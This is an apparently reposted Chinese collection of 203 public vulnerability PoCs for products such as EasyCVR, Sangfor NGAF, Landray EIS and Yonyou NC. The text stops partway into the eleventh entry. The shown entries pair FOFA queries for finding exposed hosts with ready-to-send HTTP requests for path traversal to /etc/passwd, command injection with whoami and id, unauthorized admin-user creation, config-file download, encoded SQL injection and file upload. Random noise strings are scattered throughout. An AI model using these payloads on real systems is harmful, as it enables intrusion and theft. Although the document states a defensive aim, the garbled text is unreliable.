互联网公开漏洞整理202309-202406
' ]9 d0 B9 u* r7 x4 [道一安全 2024-06-05 07:41 北京
8 V% e, V: V5 J以下文章来源于网络安全新视界 ,作者网络安全新视界; M3 ~( W# ~ f3 _5 r
2 r$ v8 l# \4 I发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
* U: R% N) k+ z. y8 J" `% `9 W8 w$ R& e! j2 X1 w& Y
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
- b& l% W6 b# H C0 F" K. ]4 u F& h N V3 K/ C$ J5 ]0 c
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。+ e* u! \4 ~& A
* }$ O7 L0 v1 u+ R" C; u
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。* I7 y) H" N3 T3 G
5 \( S$ e$ X l4 E合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。( ^7 F) F( ^7 c9 w& m; _' G
W, L" ~9 R) F7 x+ I# \
' P' _' v+ y- J: I声明. M$ J, }3 j- U; c2 L, ~7 D
' H/ H; Q& k; `/ h" D G" X* K9 R
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。" c9 `# s" X8 p5 Y( {1 C
N: n, X4 p8 R& M4 n) |' s0 @
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
7 ] Y3 d% A3 y8 R5 [$ S, M( z
+ Y3 \! |' Y B' O* M+ N- Q+ U0 \, |) o5 a; |
0 k* K- X' l0 D3 h/ x1 N" |
目录
4 r' m; m. W3 J( w( x9 t! d: G. r# H6 u& @
01" c0 x1 L* \# R+ K6 C' V/ J" f/ y" M
1 V% q8 J$ P# z" A& d A& b1. StarRocks MPP数据库未授权访问
- y/ w" B; w8 Z3 m: I" q/ Q3 m2. Casdoor系统static任意文件读取
% x L. `& W3 q2 C4 H1 }# c; W3. EasyCVR智能边缘网关 userlist 信息泄漏9 w, e" Q/ \$ n1 N6 f- Z4 p
4. EasyCVR视频管理平台存在任意用户添加
4 R& F( g7 z" Q7 u5. NUUO NVR 视频存储管理设备远程命令执行
; Q% p0 ]2 g! G" f6. 深信服 NGAF 任意文件读取
" ]- \0 Q. k5 n w) E4 n r/ q/ w7. 鸿运主动安全监控云平台任意文件下载
* M; @. n/ i- s' r" ]8. 斐讯 Phicomm 路由器RCE
& ^9 B) E/ c3 ^0 {5 L3 n# Q9. 稻壳CMS keyword 未授权SQL注入, f0 n X n7 r, ]% Q1 b! u' @
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" s2 j: A% a8 a4 ?11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
; M/ l' x+ t. ]0 N7 U0 b12. Jorani < 1.0.2 远程命令执行# Y0 k. c7 d0 K; U4 S
13. 红帆iOffice ioFileDown任意文件读取4 u5 E+ ?" l4 {2 w* H5 |' [3 s
14. 华夏ERP(jshERP)敏感信息泄露
/ [1 \2 M. l- p* q6 K8 W15. 华夏ERP getAllList信息泄露
4 T/ X5 X K% F% V% Z; }, s16. 红帆HFOffice医微云SQL注入3 e* g% A, _+ V( A4 v9 o/ x
17. 大华 DSS itcBulletin SQL 注入; J4 [- G3 c' R1 ?$ U# }- K
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
% X5 d& v, {. C8 Q) K& B19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
8 t# z1 W3 L- Q" G* n; y$ z0 }4 T1 y, t20. 大华ICC智能物联综合管理平台任意文件读取 g m+ N/ o3 r. {5 e$ }
21. 大华ICC智能物联综合管理平台random远程代码执行
4 e0 O) D2 L( z2 o. X; k" E% n22. 大华ICC智能物联综合管理平台 log4j远程代码执行
: k @! x$ E3 _9 W23. 大华ICC智能物联综合管理平台 fastjson远程代码执行$ x m5 m" G" m6 ]1 V) ~
24. 用友NC 6.5 accept.jsp任意文件上传
5 h' j9 o/ s* _, k/ Y25. 用友NC registerServlet JNDI 远程代码执行* J* c* q' l. P
26. 用友NC linkVoucher SQL注入
3 ]! g% v7 |: \% e' P$ B27. 用友 NC showcontent SQL注入
! i9 K! i- `. U$ z! c8 V3 n# ~2 z9 y28. 用友NC grouptemplet 任意文件上传
% @6 v& b* E3 f" P29. 用友NC down/bill SQL注入
5 V# E! L0 A4 e, \% y30. 用友NC importPml SQL注入
3 |4 G. s+ V) P. d: n' x0 G8 i' M31. 用友NC runStateServlet SQL注入
. {& z+ Y" J! S. g- m' U1 `32. 用友NC complainbilldetail SQL注入$ e, e8 K) ^9 b ~; t
33. 用友NC downTax/download SQL注入1 v' w0 ^5 a8 |4 p
34. 用友NC warningDetailInfo接口SQL注入. |( J$ V0 L7 p+ W5 I
35. 用友NC-Cloud importhttpscer任意文件上传
0 O! h# f# z" ^' v J0 {1 }6 @; Z9 m36. 用友NC-Cloud soapFormat XXE
/ R2 M0 k) p* B37. 用友NC-Cloud IUpdateService XXE
, T5 b( R, ?9 |38. 用友U8 Cloud smartweb2.RPC.d XXE6 Z4 V' d4 D8 e( F
39. 用友U8 Cloud RegisterServlet SQL注入; Q1 ]; G1 A; s1 E9 @; h0 t. o
40. 用友U8-Cloud XChangeServlet XXE
* w8 ?+ F# F& `" C- Y! X; t; g41. 用友U8 Cloud MeasureQueryByToolAction SQL注入- i, O9 N! N# i# H! |6 {7 g
42. 用友GRP-U8 SmartUpload01 文件上传4 m$ C/ u! d* B, J- ^6 T
43. 用友GRP-U8 userInfoWeb SQL注入致RCE1 {3 C: ?* ?- e$ X1 {/ u, Q
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
' d+ \4 ]$ i M3 U/ t7 _: B45. 用友GRP-U8 ufgovbank XXE* ~) n+ V! t9 ~8 p) ^* k
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
: v% i: X+ }- u5 a47. 用友GRP A++Cloud 政府财务云 任意文件读取
7 G8 y' c6 F. D6 P48. 用友U8 CRM swfupload 任意文件上传 Z: `6 @2 C" H# ?0 c, j4 w6 g, o
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
6 G' N/ k; B0 K0 p50. QDocs Smart School 6.4.1 filterRecords SQL注入
% A+ C3 r8 `/ s51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; _! m7 A* F8 w) T8 s52. 泛微E-Office json_common.php sql注入- E; f$ n+ C/ `
53. 迪普 DPTech VPN Service 任意文件上传
: u5 t7 v9 ^2 m" S5 b54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( q" R; n# J: q6 `1 c$ c% s! R55. 畅捷通T+ getdecallusers信息泄露
! q' }: x9 x. H5 {9 B56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
0 `' T% u- J0 t9 _6 [57. 畅捷通T+ keyEdit.aspx SQL注入
6 R0 _$ e4 l( Q7 k58. 畅捷通T+ KeyInfoList.aspx sql注入
/ M" _, h" w3 Q+ @' l6 o59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行3 w1 [8 Y0 N0 f8 K! D# [1 F/ U
60. 百卓Smart管理平台 importexport.php SQL注入
" |- C1 z5 B% D, @2 L4 n61. 浙大恩特客户资源管理系统 fileupload 任意文件上传- M4 l* j# A- N# F+ C
62. IP-guard WebServer 远程命令执行' f. U+ d! E w8 ]
63. IP-guard WebServer任意文件读取
4 Y: y( P" h% k" v1 N6 t2 d64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) F6 ?/ L9 X8 r) y8 Y65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' C& I# _- B @- m, Z. u4 d6 T& L/ u2 j
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入' A' C2 j" ]0 {/ K( a# ^( P7 q) A
67. 万户ezOFFICE wpsservlet任意文件上传
q1 f9 e0 r. l) D) i68. 万户ezOFFICE wf_printnum.jsp SQL注入) w# s+ C/ j {
69. 万户 ezOFFICE contract_gd.jsp SQL注入& J3 c3 ?3 `* }- X1 O
70. 万户ezEIP success 命令执行) R) M8 Q9 }* {: L& Q$ T& C9 N
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 D; N2 f7 t" W1 J9 I0 U72. 致远OA getAjaxDataServlet XXE
( t# @9 \6 x7 d; U* w, { l% d73. GeoServer wms远程代码执行
/ |; V0 C$ W/ x1 G74. 致远M3-server 6_1sp1 反序列化RCE
@. R- l0 V: u75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE' r' `) J7 Y- s$ p% f
76. 新开普掌上校园服务管理平台service.action远程命令执行' f8 @; O8 v) P4 {1 s. U6 o1 N
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ p3 P- q+ U. e: v* {7 t78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
$ L% T q/ Q5 S+ j& Q! w" G- e79. BYTEVALUE 百为流控路由器远程命令执行& ~' ]) N7 S( ^& k0 [- Y+ q
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 \/ V+ G1 t3 X: e ^3 e! L
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 A ^3 _2 P) |( d8 @82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行6 _' Q6 o' z9 _/ l( ?+ ~' ^
83. JeecgBoot testConnection 远程命令执行; R# V0 F4 p) m3 O+ \! B. R
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
& M& s' n8 j, \" g6 K$ y. W85. SysAid On-premise< 23.3.36远程代码执行
+ v& W; M, [ K: p$ z2 y86. 日本tosei自助洗衣机RCE" r! F; L' @5 h1 b7 w8 C: s; l
87. 安恒明御安全网关aaa_local_web_preview文件上传
3 [: Z/ O/ t, y Q0 c" Z; R7 s. w88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* ?3 i( v3 a+ c- M4 s4 X
89. 致远互联FE协作办公平台editflow_manager存在sql注入' E$ j! G8 j/ ~
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行0 q0 W+ V$ }* Q+ l+ u9 d
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
/ L6 h. ?2 a* ]" v92. 海康威视运行管理中心session命令执行
6 c; p. a9 B# J% u0 w+ b# v7 o7 i93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传* B% @8 }* \. ?
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
0 }0 _: M" o {3 r95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# X5 S, \2 k- f; a1 h/ r; ~96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 z5 V: t& N. z1 |( U97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: I- R+ }8 q# Z$ N) A
98. SpiderFlow爬虫平台远程命令执行
, ]2 o9 Q1 d: L' j' C$ U7 H5 q+ o99. Ncast盈可视高清智能录播系统busiFacade RCE0 z& o2 [& C. s$ l: p: f2 ~5 _
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传; E# Z. T% f9 @5 q2 [1 o9 R( x
101. ivanti policy secure-22.6命令注入' N: H2 ]( H4 Q4 g
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
. e8 p9 l3 p; V: j# V103. Ivanti Pulse Connect Secure VPN XXE
- _7 x/ n7 [& F104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 a4 X! l- Y, O" h" g/ T! m# G
105. SpringBlade v3.2.0 export-user SQL 注入
6 v1 F# T. |6 |) o+ s2 ?106. SpringBlade dict-biz/list SQL 注入
4 z3 Q: @* t) l' n107. SpringBlade tenant/list SQL 注入
7 r; ?/ h) M) |$ ~1 x4 L5 ]0 r108. D-Tale 3.9.0 SSRF, H1 Z' W# Z5 P; l/ H
109. Jenkins CLI 任意文件读取 P* m: ~5 L) n8 u. Q' P7 S
110. Goanywhere MFT 未授权创建管理员& L; {' D1 F) I) Z1 B( p
111. WordPress Plugin HTML5 Video Player SQL注入$ V" s: ?: Z: n o
112. WordPress Plugin NotificationX SQL 注入" c( }, H; @8 x: g: \5 A+ p
113. WordPress Automatic 插件任意文件下载和SSRF
3 p N+ \2 }$ M9 B0 y. }114. WordPress MasterStudy LMS插件 SQL注入
+ L0 N" Y/ J- F/ ^: \1 Y115. WordPress Bricks Builder <= 1.9.6 RCE& K* ]- H' y9 K. l8 i
116. wordpress js-support-ticket文件上传# `7 g5 P8 @2 N5 }+ }
117. WordPress LayerSlider插件SQL注入
" V( f9 \1 I* S& _+ B118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 m# o5 K% r$ W
119. 北京百绰智能S20后台sysmanageajax.php sql注入8 C5 Y1 S# _* z1 d N" b
120. 北京百绰智能S40管理平台导入web.php任意文件上传; C. }+ c0 `5 b5 N% z
121. 北京百绰智能S42管理平台userattestation.php任意文件上传 ^. B9 d) Y; M
122. 北京百绰智能s200管理平台/importexport.php sql注入
" O4 s; X" h7 e" k4 ]0 |3 B123. Atlassian Confluence 模板注入代码执行
4 h% ~; B+ K3 c& R4 {3 {+ A4 `0 ^124. 湖南建研工程质量检测系统任意文件上传
5 k4 X0 E& A1 ?' U( K6 X7 C! G' \, J125. ConnectWise ScreenConnect身份验证绕过
$ E0 e/ s2 p. y126. Aiohttp 路径遍历 { S7 \( Y# i3 U3 S# a- Y
127. 广联达Linkworks DataExchange.ashx XXE
4 `9 l. C, M# \0 \128. Adobe ColdFusion 反序列化7 E- G9 T1 }; F+ V
129. Adobe ColdFusion 任意文件读取
7 ^3 c) e7 v* E3 D/ G% q& E! \3 m130. Laykefu客服系统任意文件上传
1 D7 E: e+ u/ k) R131. Mini-Tmall <=20231017 SQL注入
( ^ _% K" v# K/ p6 Y+ e& E$ `132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过- H. P$ f+ e E
133. H5 云商城 file.php 文件上传7 N7 C [+ {' T9 Q
134. 网康NS-ASG应用安全网关index.php sql注入
4 H2 {3 N1 ^# A7 m% A. Q0 o& F135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
, O# a8 ]! e( ~0 ]136. NextChat cors SSRF
! ~% l' L' Q$ p0 ~9 I) p137. 福建科立迅通信指挥调度平台down_file.php sql注入
* S. }- [5 v8 Y( R6 C138. 福建科立讯通信指挥调度平台pwd_update.php sql注入. S8 v% Y3 p7 g* u9 ^7 P; o
139. 福建科立讯通信指挥调度平台editemedia.php sql注入6 f1 C& L* h+ d
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' H4 Y9 T3 Q# F9 s5 b; M
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入1 J( E& [' U5 k8 T4 c
142. CMSV6车辆监控平台系统中存在弱密码
' N) s! `6 t1 t8 `143. Netis WF2780 v2.1.40144 远程命令执行: u5 g0 s- a* L3 [8 D
144. D-Link nas_sharing.cgi 命令注入
4 U0 u. G/ |/ Q6 F' n145. Palo Alto Networks PAN-OS GlobalProtect 命令注入0 u7 y5 o3 @# D7 P; E
146. MajorDoMo thumb.php 未授权远程代码执行0 f0 K: H7 W1 L6 R
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历 v- |6 I3 t1 n4 z0 p" @# T! u
148. CrushFTP 认证绕过模板注入: Q ~# _' N- y
149. AJ-Report开源数据大屏存在远程命令执行
$ x3 N3 L# F6 F. r+ e! ^150. AJ-Report 1.4.0 认证绕过与远程代码执行
7 p3 R) x# {1 T- q2 l9 B8 J151. AJ-Report 1.4.1 pageList sql注入3 |( T0 n+ i2 Z' u8 E% L
152. Progress Kemp LoadMaster 远程命令执行9 t& R! B! r8 E
153. gradio任意文件读取
( Q1 J" q: g7 ^ t% Z& p* a154. 天维尔消防救援作战调度平台 SQL注入6 ~! }9 W9 W% S5 X$ Z7 @! F
155. 六零导航页 file.php 任意文件上传& i8 ~* C7 ]+ y$ U2 q; r/ s; f
156. TBK DVR-4104/DVR-4216 操作系统命令注入
: b1 r: L) i. V7 y157. 美特CRM upload.jsp 任意文件上传
+ r( T. l: T- D- J! e158. Mura-CMS-processAsyncObject存在SQL注入
q# {8 `# _/ E8 U" Q8 k159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
0 Y- h; q' q. B160. Sonatype Nexus Repository 3目录遍历与文件读取
9 ?; K) N7 h/ J5 O161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
) R+ C1 `! N( C9 B) C! G) i8 c162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传( l* L$ a$ Z3 u- s& s0 Q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传9 o$ C B. q$ i" |0 N
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传8 L- J6 U5 R- z1 D# ?5 j
165. OrangeHRM 3.3.3 SQL 注入
4 m' o1 q* N, y1 v2 Y0 L3 J166. 中成科信票务管理平台SeatMapHandler SQL注入
' U. z& k1 Y! J" b167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ p/ H, o) j$ e9 c2 z168. 宏景EHR OutputCode 任意文件读取* O. N. K! V9 A
169. 宏景EHR downlawbase SQL注入
8 Q$ B7 i1 ~0 N" A( z- m170. 宏景EHR DisplayExcelCustomReport 任意文件读取; m( G5 b6 E0 v; M
171. 通天星CMSV6车载定位监控平台 SQL注入5 j2 A0 ~ Q9 E0 z( \, |: v$ W
172. DT-高清车牌识别摄像机任意文件读取4 w0 N# q7 Q4 d1 j4 ?5 k
173. Check Point 安全网关任意文件读取4 p9 Z' [. w, @$ Q% r2 P' C, D4 m+ |
174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ V5 Y) f) x) W3 F' g: g+ h
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; K* \4 n$ M8 d8 i, b* D176. 电信网关配置管理系统 rewrite.php 文件上传2 Z$ b: N# i7 H t8 k! c
177. H3C路由器敏感信息泄露
L! @, i3 B! m2 l+ E178. H3C校园网自助服务系统-flexfileupload-任意文件上传2 x* W! |' G& k' c) O, ~) J! h
179. 建文工程管理系统存在任意文件读取/ H4 C' C- n, l. M1 L
180. 帮管客 CRM jiliyu SQL注入
9 }, w2 N8 s$ _% i* k8 P/ }, ?181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* L2 x8 N2 G9 d* {3 [182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建. r: `7 u- l0 U, A) f
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
/ j; |, {4 I3 T% n& Y184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
. A5 |3 J) v/ A+ {* I8 v185. 瑞友天翼应用虚拟化系统SQL注入" m2 v. N! d+ x. G' j' ]5 S, F
186. F-logic DataCube3 SQL注入" p/ g; Q/ t6 Z% h% ?/ g. s
187. Mura CMS processAsyncObject SQL注入9 D. |0 t( }$ h. Z6 c4 ]
188. 叁体-佳会视频会议 attachment 任意文件读取
) B5 p2 J# ~& w# y189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 [. t) _% y. x/ ?1 B& T Z1 d190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ |& S% a$ S6 o7 h* B191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* o2 }7 `0 P# t; f' Y
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传% L. J. m y- v: f8 }
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
1 J6 D+ |% r a0 M1 Q9 W194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
7 B! g. v( F5 s f7 a% T195. 飞鱼星上网行为管理系统 send_order.cgi命令执行, f8 \/ u2 s+ W
196. 河南省风速科技统一认证平台密码重置
% G. q* {6 U* m. L3 L/ n* t. A197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入; P" i8 G* z. e6 ?& g
198. 阿里云盘 WebDAV 命令注入
. Y9 v2 {" J& B0 n% x R199. cockpit系统assetsmanager_upload接口 文件上传" {/ R, |/ ^- T- M \7 p$ O
200. SeaCMS海洋影视管理系统dmku SQL注入5 x! c+ H' d; B# i) U# x( U
201. 方正全媒体新闻采编系统 binary SQL注入
* C% p) {9 `" T7 U0 i3 t7 Y202. 微擎系统 AccountEdit任意文件上传
( k n0 U! ]: d" m, ~3 X: [203. 红海云EHR PtFjk 文件上传8 B, O* v* k# ]. b- ~
. _- B3 q% x4 |" O
POC列表* x$ H) d9 a& ]8 P" u* _3 ~9 J: K+ N0 Y
0 V) G; O/ g+ }8 w
02' K% y- v, S( x+ |0 j5 a
2 L3 |: Z* T) q8 M1. StarRocks MPP数据库未授权访问
5 j, p# P9 D/ ^8 xFOFA :title="StarRocks"
2 O: B! Y$ g5 ?/ `! L: `GET /mem_tracker HTTP/1.11 F, w) f. e9 C
Host: URL
8 [; p' ^4 e( X+ h
+ w9 V m; l- K U! m# `
5 P% i/ r3 y7 I( _7 w2. Casdoor系统static任意文件读取
5 b8 i8 L5 |* F% Q4 ~5 z2 PFOFA :title="Casdoor"$ W7 B+ l7 ]% Y
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1- D' \( Y* ?$ K
Host: xx.xx.xx.xx:9999% g- R3 W, }! N/ l, C( B; V- e. H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 L6 r# a: A8 w1 M" C4 zConnection: close
6 F8 @) H" K! u! aAccept: */*
. S0 f0 O$ I u7 d' N( MAccept-Language: en
# y6 I: s4 X ^& Y) @4 VAccept-Encoding: gzip, y7 Y$ i8 W4 d+ x
. z. L" [! }) V
- U* U% D. O. b4 D7 ]$ b3. EasyCVR智能边缘网关 userlist 信息泄漏
7 [6 c7 W+ j' i x* t/ BFOFA :title="EasyCVR"5 H7 t% q# \, {$ A( I
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1% d/ g6 e- Z& v# r1 b- i8 x
Host: xx.xx.xx.xx
" B2 w# }* g7 Q, L$ X" u$ B6 r1 j! `& h2 G
* t0 X( I: I+ x8 S5 y5 s4. EasyCVR视频管理平台存在任意用户添加7 f' V/ N M: G0 h8 O V
FOFA :title="EasyCVR"
5 h# h) {. K- K- y9 V* x
4 m/ Y( [) F( @; j9 q5 E3 [password更改为自己的密码md5% E- u3 k" s* |. N, p
POST /api/v1/adduser HTTP/1.1
, } P* s1 W* V" U8 `7 V/ O# eHost: your-ip
; [* F4 _5 x& m8 l8 s* p) DContent-Type: application/x-www-form-urlencoded; charset=UTF-8
2 J: K3 w. J2 D c( g! W, v7 F2 ~
" Y1 Q8 u/ ]/ K9 w. C3 `name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=14 t- k7 Q: y J! Z
3 H. p2 C$ F2 m7 z% R8 `
& ~& Y% K5 z# m2 x/ Z# o; t+ L5. NUUO NVR 视频存储管理设备远程命令执行
8 G, ~4 p% ~* A# m# H! ^3 IFOFA:title="Network Video Recorder Login"$ B$ L( F( t4 Z
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1/ {: T! W; ]" j* b0 f7 m
Host: xx.xx.xx.xx
+ J, G/ b6 Y# K4 S) G2 m' [0 g9 d
) x8 i, `' v1 V; e. X6. 深信服 NGAF 任意文件读取- U4 W. `% }3 X
FOFA:title="SANGFOR | NGAF", U( l7 Z+ |3 X" W$ [+ K" z8 |
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.15 H0 N, }, V y) D
Host:/ j% e* E! S: {: [9 [7 ?
' ~) v) @& h$ @# g2 _1 r
& ^/ v( p6 z: @6 O, S R( c- n7. 鸿运主动安全监控云平台任意文件下载
/ B4 n" n" q* U$ R; IFOFA:body="./open/webApi.html"
* H) f; J( C+ d' ]GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1% Z/ Z% L1 {- b# v
Host:
8 |; V0 P$ y+ o# I: y( A3 {3 Z' w f1 L- J$ R
2 S: l9 h6 ~4 ^0 `$ w2 F
8. 斐讯 Phicomm 路由器RCE4 a) j9 m/ f, P ^. n7 D$ F
FOFA:icon_hash="-1344736688"4 w% [/ y( g3 @# N0 ?0 }
默认账号admin登录后台后,执行操作
# \! }1 o2 w$ X0 E- H: `5 kPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.15 F/ U9 w0 {4 D O
Host: x.x.x.x2 P {( N. U# b
Cookie: sysauth=第一步登录获取的cookie
) N: F1 S$ `* L) l" q9 _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz, W! V. C# R6 T; r' b. R8 U0 n
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36# q# z$ i( l8 ~) s+ r; J
7 F( Q9 Y) ?6 `
------WebKitFormBoundaryxbgjoytz
- J. ?+ C% Y$ q. h+ zContent-Disposition: form-data; name="wifiRebootEnablestatus"
6 t( r4 S5 r+ V) t! B. L7 l" C$ X6 E# _9 I, K" [# s$ k
%s6 V5 B2 _1 ^+ X# R0 K- ?' U1 Y
------WebKitFormBoundaryxbgjoytz
- _, b" i! l3 r+ H4 Q0 X( RContent-Disposition: form-data; name="wifiRebootrange", ?' t2 ~4 N! b* c8 }
: i& ^9 K. @% T2 I# V12:00; id;
# h5 C4 d+ ]" W------WebKitFormBoundaryxbgjoytz: ~2 y: y- o- V1 T3 p& A2 a: B
Content-Disposition: form-data; name="wifiRebootendrange"
: ?6 a( Q2 Y: I6 u; y6 Y x2 L# P
3 ^7 X( S2 M, e/ V%s:
0 D/ l5 z4 N! O' K------WebKitFormBoundaryxbgjoytz
) e. r# d: ~4 {/ \& N0 f2 ^Content-Disposition: form-data; name="cururl2"
' f9 x3 W0 u& `7 s% J3 w% r/ q. `3 R0 f% T" h1 Z
/ B d5 j6 E7 B5 w% g9 \ k. u4 D------WebKitFormBoundaryxbgjoytz--6 b1 R2 k8 E( t* t4 _
: }7 p9 n) C! j2 K) y$ V6 _( B6 R7 t c- b
9. 稻壳CMS keyword 未授权SQL注入
1 |: M8 P) q" f' s j; A' iFOFA:app="Doccms"
2 _" j8 [" _1 b' aGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
9 v5 Q+ J+ h' Y3 R8 nHost: x.x.x.x Q) d$ C( Z' `
3 `6 @4 A. j2 \: b6 V8 C
: o4 W W' M0 E
payload为下列语句的二次Url编码
4 i, j; r' y8 S$ \- W K8 j
9 I# b$ e9 c4 o' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#; f9 _9 V; a6 K' L
' l% t; V0 ?, F `& H0 k
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ a$ r6 D6 j. a ]
FOFA:icon_hash="953405444"* \1 F3 }/ a% D+ w9 g+ c
$ Y" d$ M- ~2 `) N [5 ]$ y. T文件上传后响应中包含上传文件的路径+ C* n& S6 Z( }. B3 D& q
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
4 B0 Z: H) @* ^$ {; KHost: x.x.x.x:xx" K4 h7 i. \. Q0 d1 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
& e; v6 ~2 _) ~" w9 @3 hContent-Length: 197* v. `6 m- ?* z; X3 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
0 n5 b$ r0 D& r5 kAccept-Encoding: gzip, deflate6 h# y6 x/ _ ]* r% a* r# `3 V
Accept-Language: zh-CN,zh;q=0.9, B: C& \8 g+ e
Connection: close
2 v E3 q7 i2 }7 MContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu+ D* X! q6 ^4 R% U& G" e7 L
2 z- ?9 e1 L" }# V% e4 C0 @+ {
------WebKitFormBoundaryxdgaqmqu
+ u. ]% N& M1 \/ r8 k$ v& r2 SContent-Disposition: form-data; name="file"filename="icfitnya.txt"# h3 }4 p# b; g7 p4 b
Content-Type: text/html% h. @& `' c5 S& W# |/ {5 X8 q
7 Z, t- Z- i3 i3 ^2 L0 ~, w
jmnqjfdsupxgfidopeixbgsxbf, A3 x! x/ }3 g; J3 O9 ^
------WebKitFormBoundaryxdgaqmqu--- k1 K& S" |6 J" I( T
" @7 s: C0 x- y
$ Z3 T; i; |6 j& v6 {! }
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入7 J" p/ G7 r' S6 x# G- a
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"9 t1 t3 y/ L( w
